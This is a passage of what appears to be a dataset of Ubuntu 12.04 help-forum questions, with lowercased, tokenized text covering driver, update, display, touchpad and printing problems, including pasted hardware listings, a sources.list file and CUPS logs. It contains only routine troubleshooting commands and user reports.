00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 01 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) 0c:00.0 network controller : broadcom corporation bcm4321 802.11a/b/g/n ( rev 01 ) rfkill list all returns : 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 1 : dell-wifi : wireless lan soft blocked : no hard blocked : no 2 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no i admit , i do n't know what to do with any of this . all i know is until yesterday , my connection stayed steady , and with the update , it keeps dropping and reconnecting .
127102	something wicked happened resolving archive.ubuntu.com ?	i downloaded ubuntu 12.04 lts final version two days ago and today installed it and when update it from terminal and update manager i got this errors and when try now open update manager or ubuntu software center it 's suddenly closed note : after problem i did add apt repository from launchpad and it 's appear in other software tab las two lines but the problem appear before i add them sure man this is mine source.list > deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise universe deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-security main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-security main restricted deb http : //us.archive.ubuntu.com/ubuntu/ precise-security universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-security universe deb http : //us.archive.ubuntu.com/ubuntu/ precise-security multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb http : //us.archive.ubuntu.com/ubuntu/ precise-proposed restricted main multiverse universe deb-src http : //extras.ubuntu.com/ubuntu precise main
127103	blank after installing ubuntu 12.04	i installed ubuntu 12.04 in windows 7 yesterday ( i used wubi to install it ) . after the install is complete i choose 'reboot now ' and after the restart , appear the words `` completing installation blablabla '' . after counting ( completing installation ) is completed , my laptop screen become blank ( black ) . then i turn off the laptop by force . when turned off , looks at a glance ubuntu page on the screen . i tried to uninstall and reinstall the previous version ( 11.04 , 10.10 , 10.04 ) and it all ends the same . blank . i want to install ubuntu again , although the old version ( previously , i was using 10.10 ) . my laptop acer aspire 4736 . please help me to solve this problem . sorry for my english . thank you . i just tried , after reboot and come out the words `` completing installation '' i press esc . exit the screen such as grub . i choose `` safe mode screen '' and complete the installation process . after the automatic restart of ubuntu and come out grub . after i selected , there was an error with the words , `` the system is running in low-graphic mode . your screen , graphics card , amd input device setting could not be detected correctly . you will need to configure these yourself . ''
127104	g210m screen brightness control issue	i have a sony vaio vpccw15fg laptop with nvidia g210m graphics card . i ca n't adjust the screen brightness ! if i use the fn shortcuts the brightness notification shows-up and there the brightness changes the level but nothing happens . i was able to adjust the brightness level in zorinos . but nothing happens when i changed the bright level , then brightness level changes radically with each step in the last stages .
127110	12.04 upgrade not working	help ! i have upgraded from 11.10 to 12.04 but it does n't pick up the keyboard so i can not type in my login keyring password to do anything . i have tried a spare usb keyboard but this is not picked up either . any if i put a usb stick in the menu comes up and i can open and edit a document - keyboard must work ! any ideas ? i get an error message - can not capture your keyboard so can not get past 'enter password to unlock your login keyring . '
127118	asus k53s f5 f6 brightness keys not working	on my asus k53s i7 , the f5 and f6 keys , for brightness controls , do n't work . in ubuntu 11.10 and in 12.04 ( by upgrading mode ) . i do n't know if there is some relationship with the first problem , but when i change brightness values by menu , and restart notebook , the default values ( 100 % ) comes back again . is out there some solution for this problems ?
127120	i am unable to install programs after 12.04 upgrade and attempt to install libreoffice	i tried to install libreoffice on ubuntu 12.04 ( after an upgrade ) , and now i ca n't install , ugrade , anything in any form . when i go to the software center , i get a message that i need to repair the package catalog before i can install anything . but the repair fails because of libreoffice files . when i try to run sudo apt-get -f install , or sudo apt-get upgrade , or anything else , those libreoffice files prevent any solution . i tried : sudo dpkg -- configure -a sudo apt-get install -f sudo apt-get update sudo apt-get upgrade but that did n't help either . here is the output of both the install and repair attempts : http : //pastebin.com/a8ztjdtr unpacking libreoffice-common ( from ... /libreoffice-common_1 % 3a3.5.2-2ubuntu1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/libreoffice-common_1 % 3a3.5.2-2ubuntu1_all.deb ( -- unpack ) : trying to overwrite '/usr/bin/soffice ' , which is also in package openoffice.org-debian-menus 3.3-9556 no apport report written because maxreports is reached already any suggestions ?
127122	i upgraded to 12.04 but my pc boots to command line instead of unity or gnome2 . help !	i upgraded from 11.10 to 12.04 but my pc boots to command line instead of unity or gnome2 . i can follow directions and usually find my own answers , but i 'm not having any luck so far . help ! ?
127123	crashes when using gnome tweak tool with gnome 3.4	well i 'm new in this site and i have some problems with ubuntu 12.04 i made a clean installation and install gnome 3.4 , gnome classic and cinnamon but when i want to run gnome tweak tool in gnome 3.4 , it closes immediately , in unity , cinnamon and gnome classic it runs perfectly . also i always receive a warning about ubuntu crashed and sometimes it reboots can you help me in this ?
127126	how do i change the background of the notification bubbles ?	just installed 12.04 and it 's great so far . i 've noticed that the launcher background - and notification bubble - change colour according to the wallpaper i 've selected . how do i keep the wallpaper but change the notification background colour back to the transparent black ? right now , i have the blue-ish wallpaper set but do n't like the blue notifications .
127128	why wo n't my hard drive show up ?	i had ubuntu 11.10 installed with wubi on my windows 7 x64 computer . i wanted to install 12.04 , so i just uninstalled 11.04 and installed 12.04 also using wubi . when i ran 12.04 as a livedvd , i was able to access my windows hard drive , but after i installed 12.04 my windows hard drive does n't show up anymore and i need to access it . any help with this would be greatly appreciated .
127130	splash screen stopped appearing	i upgraded to ubuntu 12.04 , and the splash screen does not appear anymore . instead i have a black screen even if the system boots correctly . does any body knows how to fix this .
127132	graphical slow response issues ?	i just installed ubuntu 12.04 but my ubuntu is not running smoothly . it is becoming stuck . is there a problem with my graphic driver ? i say this because 1 out of the 2 ati graphic drivers failed installing . ati/amd proprietary fglrx graphics driver ( post-release updates ) - failed ati/amd proprietary fglrx graphics driver - failed
127137	12.04lts touchpad not working correctly	i upgraded to 12.04lts from 11.10 this morning on my samsung series 7 laptop and my touchpad immediately started experiencing weird behaviors : the mouse stops moving completely when i place two fingers on the mouse pad , even if i put one finger in the left mouse button area ( which used to work ) . when i try to right-click ( like on a hyperlink or icon ) i get the expected left-button behavior . i can no longer touch a scroll bar , press the left button , and drag vertically to scroll up/down . i have started changing the synaptics touchpad driver values , however i have n't found anything to be effective yet . below are my synaptic driver values , does anything look blatantly wrong ? what else can i do to troubleshoot this issue ? leftedge = 130 rightedge = 3130 topedge = 123 bottomedge = 2159 fingerlow = 1 fingerhigh = 1 fingerpress = 256 maxtaptime = 180 maxtapmove = 175 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 75 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 79 horizscrolldelta = 79 vertedgescroll = 0 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0502639 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 318 edgemotionusealways = 0 touchpadoff = 2 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 19 verthysteresis = 19 clickpad = 0 just to be clear , this is only effecting touchpad behavior . an external mouse works as expected .
127138	how do you log in to the root account in ubuntu 12.04lts ?	how do i login as root in ubuntu 12.04lts ? i already know how to set the passwords . i need to log in .
127141	increase icons size in gnome shell 3.4 dash	how do i increase icons size in gnome shell dash ? i have tried http : //abhizweblog.blogspot.in/2011/06/gnome3-change-icon-size.html and tried changing /usr/share/gnome-shell/js/ui/dash.js file as well . still didnt work ? any suggestions ?
127143	how do i revert the alt-tab behavior so that switching to an app brings to the front all the windows of that app ?	in 11.10 , the unity alt-tab switcher brought all the windows belonging to an application to the front when switching to the application like on mac ( unless you waited for long enough that the app 's switcher entry expanded to a window selection in which case you got to select which window to switch to ) . in 12.04 , switching to an app with multiple window open ( in the same workspace ) brings to the from one of the windows . ( i see no logic in which one is brought to the front . ) how do i , under 12.04 , revert to the alt-tab behavior of 11.10 so that switching to an app brings to the front all the windows of that app ?
127147	unable to switch users in ubuntu 12.04	whenever i try to switch users in ubuntu 12.04 it goes to a black screen with a cursor and hangs . if i do the ctrl-alt-f6 ( or any f1-6 button for that matter ) it will switch to a command prompt and then if i switch back to ctrl-alt-f7 i 'm presented with the login screen that you get when you return from a screenlock . is this a bug in ubuntu or does something need reconfigured ?
127151	ethernet conection not working atheros ar8152 os 12.04	i have instaled ubuntu 12.04 but my network conection does n't work and i know it 's becouse of the drivers i 've run $ lspci | grep ethernet and this is the result 02:00.0 ethernet controller : atheros communications ar8152 v2.0 fast ethernet ( rev c1 ) and even ifconfig -a and lspci -v and posted it in paste bin ifconfig -a and lspci -v i try to fix it by dowloading this drivers drivers website and instaling them with this commands $ tar -xjvf compat-wireless-2.6.tar.bz2 $ cd compat-wireless* $ scripts/driver-select atl1c $ make $ sudo make install $ sudo modprobe atl1c but it fails in the last one becouse it cant find atl1c with compat-wireless-2012-04-26-pc.tar.bz2 it complete the modprobe but the conection dont works please , i need a solution . i dont know what else to do for making this work
127155	ca n't print to networked printer after fresh install of ubuntu 12.04 - 64 bit	background : i have a server running clearos , operating as my print server ( among other services ) . back when i was using ubuntu 10.04 , i was able to print to it fine . fast forward , i 've upgraded to ubuntu 12.04 64 bit via a fresh install , and now when i follow the wizard to setup an ipp printer , my documents wo n't print ( though they work from other clients fine ) . any ideas ? here are the client logs : == > access_log < == localhost - - [ 28/apr/2012:12:41:28 -0500 ] `` post /printers/hl-2140 http/1.1 '' 200 284 create-job successful-ok localhost - - [ 28/apr/2012:12:41:28 -0500 ] `` post /printers/hl-2140 http/1.1 '' 200 14145 send-document successful-ok == > error_log < == e [ 28/apr/2012:12:41:33 -0500 ] [ job 9 ] unable to add document to print job . == > access_log < == localhost - - [ 28/apr/2012:12:41:35 -0500 ] `` post / http/1.1 '' 200 345 create-printer-subscription successful-ok localhost - - [ 28/apr/2012:12:41:35 -0500 ] `` post / http/1.1 '' 200 345 create-printer-subscription successful-ok == > error_log < == w [ 28/apr/2012:12:42:34 -0500 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'hl-2140-gray.. ' already exists w [ 28/apr/2012:12:42:34 -0500 ] failed to createdevice : org.freedesktop.colormanager.alreadyexists : device id 'cups-hl-2140 ' already exists == > access_log < == localhost - ksoviero [ 28/apr/2012:12:42:45 -0500 ] `` post / http/1.1 '' 200 186 renew-subscription successful-ok here are the server logs : == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:30 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 400 0 unknown-0000 - 10.0.0.170 - - [ 28/apr/2012:12:44:30 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 621 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:30 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 262 validate-job successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:30 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 262 create-job successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:30 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:30 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == e [ 28/apr/2012:12:44:30 -0500 ] cupsdreadclient : 12 ipp read error ! i [ 28/apr/2012:12:44:30 -0500 ] [ job 91 ] adding start banner page `` none '' . i [ 28/apr/2012:12:44:30 -0500 ] [ job 91 ] queued on `` brother_hl-2140_series_usb_1 '' by `` ksoviero '' . == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:30 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 426 577419 send-document successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:31 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:31 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:31 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == e [ 28/apr/2012:12:44:31 -0500 ] send-document : unauthorized i [ 28/apr/2012:12:44:31 -0500 ] cupsdcloseclient : ssl shutdown successful ! i [ 28/apr/2012:12:44:31 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:32 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:32 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:32 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:44:32 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:33 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:44:33 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:34 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:34 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:35 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:44:35 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:37 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:37 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:38 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:44:38 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:42 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:42 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:43 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:44:43 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:50 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:50 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:51 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:51 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:51 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:44:51 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:52 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:52 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:44:52 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:52 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:54 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:54 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:54 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:44:53 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:56 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:44:56 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:44:57 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:57 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:44:59 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:44:59 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 316 get-jobs successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-printers successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-classes successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 72 cups-get-default client-error-not-found localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 225 cups-get-printers successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 316 get-jobs successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-printers successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-classes successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 72 cups-get-default client-error-not-found localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 412 cups-get-printers successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 316 get-jobs successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-printers successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-classes successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 72 cups-get-default client-error-not-found localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 316 get-jobs successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:02 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:02 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 316 get-jobs successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-printers successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-classes successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 72 cups-get-default client-error-not-found localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 225 cups-get-printers successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 316 get-jobs successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-printers successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-classes successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 72 cups-get-default client-error-not-found localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 412 cups-get-printers successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 316 get-jobs successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-printers successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 414 cups-get-classes successful-ok localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 72 cups-get-default client-error-not-found localhost - - [ 28/apr/2012:12:45:02 -0500 ] `` post / http/1.1 '' 200 316 get-jobs successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:04 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:45:04 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:45:10 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:10 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:11 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:11 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:12 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:12 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:12 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:45:12 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:45:13 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:45:13 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:45:14 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:14 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:14 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:45:14 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:45:16 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 369 get-job-attributes successful-ok == > /var/log/cups/error_log < == i [ 28/apr/2012:12:45:16 -0500 ] cupsdcloseclient : ssl shutdown successful ! == > /var/log/cups/access_log < == 10.0.0.170 - - [ 28/apr/2012:12:45:17 -0500 ] `` post /printers/brother_hl-2140_series_usb_1 http/1.1 '' 200 654 get-printer-attributes successful-ok 10.0.0.170 - - [ 28/apr/2012:12:45:17 -0500 ] `` post 